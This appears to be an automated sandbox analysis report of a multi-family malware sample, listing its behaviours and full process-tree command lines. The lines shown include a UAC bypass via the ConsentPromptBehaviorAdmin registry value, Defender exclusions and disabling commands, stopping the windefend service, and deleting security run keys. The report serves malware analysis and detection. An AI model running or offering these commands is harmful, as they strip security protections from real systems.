description ioc Process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision reg.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 reg.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz reg.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with WMI 11 IoCs
pid Process 5040 WMIC.exe 4652 WMIC.exe 5660 WMIC.exe 4644 WMIC.exe 6012 WMIC.exe 1160 WMIC.exe 6060 WMIC.exe 4796 WMIC.exe 2844 WMIC.exe 852 WMIC.exe 736 WMIC.exe -
Kills process with taskkill 1 IoCs
pid Process 5524 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 8 IoCs
pid Process 336 PING.EXE 3460 PING.EXE 4448 PING.EXE 5032 PING.EXE 5552 PING.EXE 5972 PING.EXE 3392 PING.EXE 5728 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4124 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 6100 powershell.exe 6100 powershell.exe 1004 powershell.exe 1004 powershell.exe 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 2036 powershell.exe 2036 powershell.exe 2300 powershell.exe 2300 powershell.exe 5572 powershell.exe 5572 powershell.exe 5372 powershell.exe 4000 powershell.exe 5372 powershell.exe 4000 powershell.exe 4652 powershell.exe 4652 powershell.exe 4840 powershell.exe 4840 powershell.exe 6100 powershell.exe 6100 powershell.exe 3660 powershell.exe 3660 powershell.exe 3088 powershell.exe 3088 powershell.exe 5772 powershell.exe 5772 powershell.exe 752 powershell.exe 752 powershell.exe 1668 powershell.exe 1668 powershell.exe 6020 powershell.exe 6020 powershell.exe 4516 powershell.exe 4516 powershell.exe 5204 powershell.exe 5204 powershell.exe 4688 powershell.exe 4688 powershell.exe 3780 powershell.exe 3780 powershell.exe 628 powershell.exe 628 powershell.exe 5316 powershell.exe 5316 powershell.exe 1272 powershell.exe 1272 powershell.exe 1152 powershell.exe 1152 powershell.exe 3096 powershell.exe 3096 powershell.exe 4756 powershell.exe 4756 powershell.exe 2512 PowerShell.exe 2512 PowerShell.exe 2512 PowerShell.exe 4848 IntelSvc.exe 4848 IntelSvc.exe 3780 IntelSvc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 6100 powershell.exe Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeDebugPrivilege 5372 powershell.exe Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe Token: SeDebugPrivilege 4840 powershell.exe Token: SeDebugPrivilege 6100 powershell.exe Token: SeDebugPrivilege 3660 powershell.exe Token: SeDebugPrivilege 3088 powershell.exe Token: SeDebugPrivilege 5772 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 6020 powershell.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 5204 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 628 powershell.exe Token: SeDebugPrivilege 5316 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeTakeOwnershipPrivilege 4020 takeown.exe Token: SeDebugPrivilege 5524 taskkill.exe Token: SeIncreaseQuotaPrivilege 5660 WMIC.exe Token: SeSecurityPrivilege 5660 WMIC.exe Token: SeTakeOwnershipPrivilege 5660 WMIC.exe Token: SeLoadDriverPrivilege 5660 WMIC.exe Token: SeSystemProfilePrivilege 5660 WMIC.exe Token: SeSystemtimePrivilege 5660 WMIC.exe Token: SeProfSingleProcessPrivilege 5660 WMIC.exe Token: SeIncBasePriorityPrivilege 5660 WMIC.exe Token: SeCreatePagefilePrivilege 5660 WMIC.exe Token: SeBackupPrivilege 5660 WMIC.exe Token: SeRestorePrivilege 5660 WMIC.exe Token: SeShutdownPrivilege 5660 WMIC.exe Token: SeDebugPrivilege 5660 WMIC.exe Token: SeSystemEnvironmentPrivilege 5660 WMIC.exe Token: SeRemoteShutdownPrivilege 5660 WMIC.exe Token: SeUndockPrivilege 5660 WMIC.exe Token: SeManageVolumePrivilege 5660 WMIC.exe Token: 33 5660 WMIC.exe Token: 34 5660 WMIC.exe Token: 35 5660 WMIC.exe Token: 36 5660 WMIC.exe Token: SeIncreaseQuotaPrivilege 5660 WMIC.exe Token: SeSecurityPrivilege 5660 WMIC.exe Token: SeTakeOwnershipPrivilege 5660 WMIC.exe Token: SeLoadDriverPrivilege 5660 WMIC.exe Token: SeSystemProfilePrivilege 5660 WMIC.exe Token: SeSystemtimePrivilege 5660 WMIC.exe Token: SeProfSingleProcessPrivilege 5660 WMIC.exe Token: SeIncBasePriorityPrivilege 5660 WMIC.exe Token: SeCreatePagefilePrivilege 5660 WMIC.exe Token: SeBackupPrivilege 5660 WMIC.exe Token: SeRestorePrivilege 5660 WMIC.exe Token: SeShutdownPrivilege 5660 WMIC.exe Token: SeDebugPrivilege 5660 WMIC.exe Token: SeSystemEnvironmentPrivilege 5660 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3780 IntelSvc.exe 3780 IntelSvc.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3780 IntelSvc.exe 3780 IntelSvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3068 wrote to memory of 6036 3068 2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 88 PID 3068 wrote to memory of 6036 3068 2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 88 PID 3068 wrote to memory of 6036 3068 2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 88 PID 6036 wrote to memory of 2380 6036 cmd.exe 90 PID 6036 wrote to memory of 2380 6036 cmd.exe 90 PID 6036 wrote to memory of 2380 6036 cmd.exe 90 PID 2380 wrote to memory of 4568 2380 cmd.exe 92 PID 2380 wrote to memory of 4568 2380 cmd.exe 92 PID 2380 wrote to memory of 4568 2380 cmd.exe 92 PID 2380 wrote to memory of 4628 2380 cmd.exe 93 PID 2380 wrote to memory of 4628 2380 cmd.exe 93 PID 2380 wrote to memory of 4628 2380 cmd.exe 93 PID 4568 wrote to memory of 4832 4568 wscript.exe 94 PID 4568 wrote to memory of 4832 4568 wscript.exe 94 PID 4568 wrote to memory of 4832 4568 wscript.exe 94 PID 2380 wrote to memory of 6100 2380 cmd.exe 96 PID 2380 wrote to memory of 6100 2380 cmd.exe 96 PID 2380 wrote to memory of 6100 2380 cmd.exe 96 PID 6100 wrote to memory of 4936 6100 powershell.exe 99 PID 6100 wrote to memory of 4936 6100 powershell.exe 99 PID 6100 wrote to memory of 4936 6100 powershell.exe 99 PID 2380 wrote to memory of 5552 2380 cmd.exe 101 PID 2380 wrote to memory of 5552 2380 cmd.exe 101 PID 2380 wrote to memory of 5552 2380 cmd.exe 101 PID 4936 wrote to memory of 5352 4936 cmd.exe 102 PID 4936 wrote to memory of 5352 4936 cmd.exe 102 PID 4936 wrote to memory of 5352 4936 cmd.exe 102 PID 4936 wrote to memory of 5860 4936 cmd.exe 105 PID 4936 wrote to memory of 5860 4936 cmd.exe 105 PID 4936 wrote to memory of 5860 4936 cmd.exe 105 PID 4936 wrote to memory of 6060 4936 cmd.exe 106 PID 4936 wrote to memory of 6060 4936 cmd.exe 106 PID 4936 wrote to memory of 6060 4936 cmd.exe 106 PID 4936 wrote to memory of 3948 4936 cmd.exe 107 PID 4936 wrote to memory of 3948 4936 cmd.exe 107 PID 4936 wrote to memory of 3948 4936 cmd.exe 107 PID 4936 wrote to memory of 1004 4936 cmd.exe 108 PID 4936 wrote to memory of 1004 4936 cmd.exe 108 PID 4936 wrote to memory of 1004 4936 cmd.exe 108 PID 1004 wrote to memory of 1080 1004 powershell.exe 109 PID 1004 wrote to memory of 1080 1004 powershell.exe 109 PID 1004 wrote to memory of 1080 1004 powershell.exe 109 PID 4936 wrote to memory of 5972 4936 cmd.exe 111 PID 4936 wrote to memory of 5972 4936 cmd.exe 111 PID 4936 wrote to memory of 5972 4936 cmd.exe 111 PID 1080 wrote to memory of 3236 1080 cmd.exe 112 PID 1080 wrote to memory of 3236 1080 cmd.exe 112 PID 1080 wrote to memory of 3236 1080 cmd.exe 112 PID 3236 wrote to memory of 5448 3236 powershell.exe 113 PID 3236 wrote to memory of 5448 3236 powershell.exe 113 PID 3236 wrote to memory of 5448 3236 powershell.exe 113 PID 5448 wrote to memory of 3496 5448 cmd.exe 115 PID 5448 wrote to memory of 3496 5448 cmd.exe 115 PID 5448 wrote to memory of 3496 5448 cmd.exe 115 PID 4936 wrote to memory of 5244 4936 cmd.exe 119 PID 4936 wrote to memory of 5244 4936 cmd.exe 119 PID 4936 wrote to memory of 5244 4936 cmd.exe 119 PID 4936 wrote to memory of 5072 4936 cmd.exe 120 PID 4936 wrote to memory of 5072 4936 cmd.exe 120 PID 4936 wrote to memory of 5072 4936 cmd.exe 120 PID 4936 wrote to memory of 2036 4936 cmd.exe 121 PID 4936 wrote to memory of 2036 4936 cmd.exe 121 PID 4936 wrote to memory of 2036 4936 cmd.exe 121 PID 4936 wrote to memory of 2300 4936 cmd.exe 122 -
Views/modifies file attributes 1 TTPs 22 IoCs
pid Process 972 attrib.exe 1716 attrib.exe 4688 attrib.exe 4636 attrib.exe 5648 attrib.exe 872 attrib.exe 2032 attrib.exe 3860 attrib.exe 3064 attrib.exe 2720 attrib.exe 4568 attrib.exe 4616 attrib.exe 1852 attrib.exe 5556 attrib.exe 1448 attrib.exe 4304 attrib.exe 316 attrib.exe 4492 attrib.exe 4564 attrib.exe 532 attrib.exe 6060 attrib.exe 368 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Start.cmd" "2⤵
- Suspicious use of WriteProcessMemory
PID:6036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.cmd"3⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\wscript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\testvb1.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public\ & copy /v /b /y C:\Users\Public\testvb1.vbs C:\Users\Public\testvb2.vbs5⤵PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:4628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start2.cmd' -windowstyle hidden"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Start2.cmd" "5⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start2.cmd"6⤵PID:5352
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"6⤵PID:5860
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe "0x0"6⤵
- System Location Discovery: System Language Discovery
PID:6060
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"6⤵PID:3948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\uac.cmd' -windowstyle hidden"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.cmd" "7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' -Verb RunAs -Wait -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 09⤵
- Suspicious use of WriteProcessMemory
PID:5448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 010⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5972
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"6⤵
- System Location Discovery: System Language Discovery
PID:5244
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe "0x0"6⤵PID:5072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Start3.cmd'" -Encoding ascii}" -Wait6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start3.cmd' -verb runas -windowstyle hidden"6⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Start3.cmd"7⤵
- Drops file in System32 directory
PID:1936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd' -verb runas -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd"9⤵PID:4872
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension bat10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -MAPSReporting Disable10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -PUAProtection disable10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5772
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ScanScheduleDay "8"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -HighThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ModerateThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -LowThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -SevereThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\L2cache"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tfile"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tweaker"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension cmd8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5316
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension exe8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\SysWOW64\net.exeC:\Windows\System32\NET.exe stop windefend8⤵
- System Location Discovery: System Language Discovery
PID:5704 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend9⤵PID:5556
-
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\SC.exe config windefend start=disabled8⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f /reg:648⤵PID:2436
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f8⤵PID:4728
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f8⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f8⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f8⤵PID:1332
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f8⤵PID:5696
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f8⤵PID:4676
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:648⤵PID:5952
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f8⤵PID:3240
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f8⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f8⤵PID:1508
-
-
